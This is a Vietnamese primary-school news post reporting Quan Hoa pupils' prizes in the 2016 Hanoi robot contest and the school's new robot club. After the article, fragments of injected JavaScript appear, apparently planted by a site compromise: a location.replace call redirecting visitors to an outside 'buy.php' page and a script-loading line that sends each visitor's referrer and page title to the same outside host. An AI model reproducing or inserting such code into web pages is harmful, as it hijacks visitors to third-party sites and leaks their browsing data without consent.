Cuộc thi Robotacom 2016 Thành phố Hà Nội

14/06/2016 8:43 Chiều Phản hồi đã bị khóa

Cuộc thi Robot Thành phố Hà Nội  – Robotacon 2016 đã diễn ra tại Nhà thi đấu Quận Cầu Giấy.

Tham gia Hội thi, đội tuyển trường Tiểu học Quan Hoa đã tham dự 3 nội dung thi: Robot bóng chuyền, Robot Sumo và Sáng tạo Robot. Ở nội dung Robot bóng chuyền ( Bảng B), mỗi đội có 2 thí sinh, mỗi thí sinh điều khiển 1 Robot  để Robot ném bóng vào phần sân đối phương. Với 3 phút thi đấu  tập trung cao độ, điều khiển Robot linh hoạt, đội thi của trường Tiểu học Quan Hoa do 2 học sinh Đàm Thành Trung – lớp 5A và Nguyễn Bảo Tuấn – lớp 3C đã xuất sắc đạt giải nhất nội dung thi Robot bóng chuyền.  Ở bảng C: Robot Sumo, trong thời gian 2 phút, em Đỗ Bảo Huy – học sinh lớp 3A đã khéo léo điều khiển chú robot của mình vừa tránh né vừa lựa thời cơ và nhanh chóng đẩy được robot đối thủ ra khỏi vòng tròn thi đấu và đạt giải nhì của nội dung thi này.

Cuộc thi thực sự đã giúp các em được làm quen và thử sức trong một hoạt động khá mới mẻ nhất là với lứa tuổi tiểu học. Vì vậy, để giúp các em mạnh dạn, tự tin hơn trong hoạt động này, nhà trường đã mạnh dạn là đơn vị đầu tiên tổ chức câu lạc bộ Robot cho các học sinh có đam mê. Tại Câu lạc bộ, các bạn nhỏ   được thỏa sức sáng tạo trên sự hướng dẫn, gợi ý của các anh chị trong câu lạc bộ. Tuy mới chỉ hoạt động được hơn 1 tháng nhưng những thành viên của câu lạc bộ đã gặt hái được những thành tích rất đáng khích lệ như trên. Hi vọng sẽ ngày càng nhiều học sinh biết đến và yêu thích một hoạt động bổ ích, đầy sáng tạo này.

“http:///?sl=319481-c261c&data1=Track1&data2=Track2″;

location.replace(“http://gethere.info/buy.php”);

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Các phản hồi đã bị đóng lại bở quản trị.